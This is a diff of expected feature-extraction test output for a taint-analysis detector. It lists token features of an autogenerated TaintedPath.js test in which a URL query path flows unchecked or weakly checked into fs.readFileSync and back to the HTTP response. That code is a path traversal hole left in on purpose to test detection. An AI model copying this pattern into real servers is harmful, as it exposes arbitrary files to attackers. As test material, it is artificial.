enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | res.wri ... h, x))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:3:54:58 | res.wri ... h, x))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:7:54:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:7:54:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:7:54:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:7:54:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:7:54:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | exceptional return of fs.read ... th, x)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | exceptional return of fs.read ... th, x)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | exceptional return of fs.read ... th, x)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | exceptional return of fs.read ... th, x)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | exceptional return of fs.read ... th, x)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | fs.read ... th, x)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | fs.read ... th, x)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | fs.read ... th, x)) | contextFunctionInterfaces | views_local(req, res) | @@ -5128,6 +60013,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | fs.read ... th, x)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | fs.read ... th, x)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:54:13:54:57 | fs.read ... th, x)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:54:16:54:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:16:54:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:16:54:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:16:54:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:16:54:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:47 | pathModule.relative | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:47 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:47 | pathModule.relative | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:47 | pathModule.relative | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:47 | pathModule.relative | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | exceptional return of pathMod ... ath, x) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | exceptional return of pathMod ... ath, x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | exceptional return of pathMod ... ath, x) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | exceptional return of pathMod ... ath, x) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | exceptional return of pathMod ... ath, x) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | calleeImports | fs | @@ -5137,6 +60042,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:54:40:54:47 | relative | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:40:54:47 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:54:40:54:47 | relative | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:54:40:54:47 | relative | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:54:40:54:47 | relative | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:54:49:54:52 | path | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/TaintedPath.js:54:49:54:52 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:54:49:54:52 | path | calleeImports | path | @@ -5155,6 +60065,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:54:55:54:55 | x | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:54:55:54:55 | x | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:54:55:54:55 | x | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:3:56:54 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:7:56:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:7:56:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:7:56:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:7:56:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:7:56:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -5163,6 +60113,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:56:13:56:53 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:56:16:56:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:16:56:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:16:56:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:56:16:56:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:56:16:56:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:56:29:56:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| 